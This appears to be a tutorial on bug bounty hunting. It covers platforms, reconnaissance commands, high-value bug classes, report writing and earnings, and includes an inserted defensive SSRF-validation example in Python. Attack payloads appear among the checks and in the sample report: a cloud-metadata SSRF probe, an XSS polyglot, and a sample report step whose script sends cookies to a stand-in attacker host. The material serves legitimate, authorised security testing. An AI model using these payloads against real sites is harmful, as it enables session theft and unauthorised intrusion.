Key Takeaways
- Top hunters earn $500K-$2M+ annually
- Reconnaissance is 80% of successful hunting
- Report quality directly impacts payout amounts
- Specialization beats broad, shallow testing
1. What is Bug Bounty Hunting?
Bug bounty hunting is the practice of finding security vulnerabilities in websites and applications for rewards. Companies like Google, Microsoft, and Facebook pay researchers thousands of dollars for valid security reports. It's a legal way to hack—with authorization—and get paid.
Bounty Examples
- Google: Up to $31,337 for critical bugs
- Apple: Up to $1,000,000 for zero-click kernel RCE
- Microsoft: Up to $250,000 for Azure vulnerabilities
- Facebook: $500 - $50,000+ per bug
2. Major Bug Bounty Platforms
HackerOne
Bugcrowd
Intigriti
Synack (invite only)
YesWeHack
Cobalt
Choosing Programs
- Start with VDPs: Vulnerability Disclosure Programs (no bounty) for practice
- Wide scope programs: More assets = more opportunities
- Responsive programs: Check average response time
- Avoid "No bounty table": Focus on programs with clear payouts
3. The Hunting Methodology
The 4-Phase Approach
- Reconnaissance: Discover all assets, subdomains, technologies
- Mapping: Understand application functionality, user roles
- Vulnerability Discovery: Test for security issues
- Exploitation & Reporting: Prove impact, write clear report
4. Reconnaissance Deep Dive
Subdomain Enumeration
# Passive subdomain discovery
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com
assetfinder --subs-only target.com
# Active subdomain bruteforce
gobuster dns -d target.com -w wordlist.txt
# Combine and resolve
cat subs.txt | httpx -silent -o live_hosts.txt
# Find subdomain takeovers
subjack -w subs.txt -t 100 -o takeovers.txt
Content Discovery
# Directory brute forcing
feroxbuster -u https://target.com -w /path/to/wordlist
# Parameter discovery
arjun -u https://target.com/page
# JavaScript analysis
cat urls.txt | getJS --complete | tee js_files.txt
cat js_files.txt | xargs -I% bash -c 'python3 LinkFinder.py -i % -o cli'
# Wayback Machine
echo target.com | waybackurls | tee wayback.txt
cat wayback.txt | grep -E "\\.js$" | sort -u
Technology Fingerprinting
# Identify tech stack
whatweb https://target.com
wappalyzer-cli https://target.com
# CMS detection
nuclei -u https://target.com -t technologies/
# Check for known CVEs based on versions
nuclei -u https://target.com -t cves/
5. High-Value Vulnerabilities
Critical Bugs ($10K-$100K+)
- Remote Code Execution (RCE): Command injection, SSTI, deserialization
- Authentication Bypass: Access admin without credentials
- SQL Injection: Database access, data exfiltration
- SSRF to Internal Services: Access cloud metadata, internal APIs
High Bugs ($1K-$10K)
- IDOR/BOLA: Access other users' data
- Stored XSS: Account takeover via session theft
- Privilege Escalation: User to admin
- Sensitive Data Exposure: API keys, credentials in responses
# Quick SSRF check
echo "https://target.com/api/fetch?url=http://169.254.169.254/" | httpx
# IDOR testing
# Original: GET /api/users/123/profile
# Test: GET /api/users/124/profile (other user's data)
# XSS polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
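The "SSRF to Internal Services" entry and the quick SSRF check above show the attacker's side; the server-side fix is to judge the resolved address, not the URL string. This is an added example, not code from the page: a fetch-URL check that rejects non-HTTP schemes, embedded credentials, and any host whose DNS answers (including IPv4-mapped IPv6 forms) land in private, loopback or link-local space such as the 169.254.169.254 metadata endpoint. The hostnames, the SAMPLE_DNS table and the function names are constructed assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample DNS answers so the example runs offline; the default
# resolver below uses real DNS. Hypothetical hostnames, not from the page.
SAMPLE_DNS = {
    "api.example.com": ["1.2.3.4"],                        # public only
    "internal.example.com": ["1.2.3.4", "10.0.0.5"],       # one answer is private
    "169.254.169.254": ["169.254.169.254"],                # cloud metadata literal
    "::ffff:169.254.169.254": ["::ffff:169.254.169.254"],  # IPv4-mapped IPv6 form
}

def sample_resolve(host):
    """Offline stand-in for resolve_all; unknown hosts fail like NXDOMAIN."""
    if host not in SAMPLE_DNS:
        raise socket.gaierror(host)
    return SAMPLE_DNS[host]

def resolve_all(host):
    """Every A/AAAA answer for host; IP literals in any encoding come back normalised."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_public_ip(ip_str):
    """True only for globally routable addresses; unwraps IPv4-mapped IPv6."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def fetch_target_is_safe(url, resolve=resolve_all):
    """Decide whether a user-supplied fetch URL may be requested server-side.

    Returns (allowed, reason). Every host, IP literals included, goes through
    the resolver, so the address is judged rather than the string. The caller
    must connect to the vetted addresses (not re-resolve) and re-run this check
    on every redirect, otherwise DNS rebinding or a redirect reopens the hole.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    try:
        addrs = resolve(parts.hostname)
    except (socket.gaierror, ValueError, UnicodeError):
        return False, "host does not resolve"
    for addr in addrs:
        if not is_public_ip(addr):
            return False, "%s resolves to non-public %s" % (parts.hostname, addr)
    return True, "ok"
```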
6. Writing Reports That Pay
Report Structure
- Title: Clear, specific description
- Severity: Use CVSS or platform scale
- Description: Technical explanation
- Steps to Reproduce: Exact, reproducible steps
- Proof of Concept: Screenshots, video, code
- Impact: Real-world consequences
- Remediation: How to fix
## Title: Stored XSS in Profile Bio Leads to Account Takeover
## Severity: High (8.1)
## Description
A stored XSS vulnerability exists in the user profile bio field at
/settings/profile. The application fails to sanitize user input before
rendering it in other users' browsers.
## Steps to Reproduce
1. Log in to account A
2. Navigate to Settings > Profile
3. In the "Bio" field, enter: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
4. Save profile
5. Log in to account B, view user A's profile
6. Observe JavaScript execution and cookie theft
## Impact
An attacker can steal session cookies of any user who views their profile,
leading to complete account takeover of victim accounts.
7. Essential Bug Bounty Tools
- Burp Suite Pro: Web proxy, scanner, Intruder ($449/year)
- Subfinder/Amass: Subdomain enumeration
- Nuclei: Template-based vulnerability scanning
- FFUF/Feroxbuster: Fast content discovery
- SQLMap: SQL injection automation
- httpx: HTTP probing and analysis
8. Maximizing Earnings
Pro Tips
- Specialize: Master one vuln class (SSRF, OAuth, GraphQL)
- Hunt new programs: Less competition, more low-hanging fruit
- Chain vulnerabilities: IDOR + CSRF = higher impact = higher payout
- Build reputation: Higher signal = private program invites
- Automate recon: More assets covered = more bugs found
FAQ
How long before I find my first bug?
Most beginners find their first valid bug within 1-3 months of consistent hunting. Focus on learning, not earnings initially.
Can I do bug bounty full-time?
Yes, top hunters earn $200K-$2M+ annually. However, income is inconsistent. Build savings and reputation before going full-time.
What's the best vulnerability to specialize in?
Business logic flaws, authentication bypasses, and API vulnerabilities are consistently high-value and hard to automate.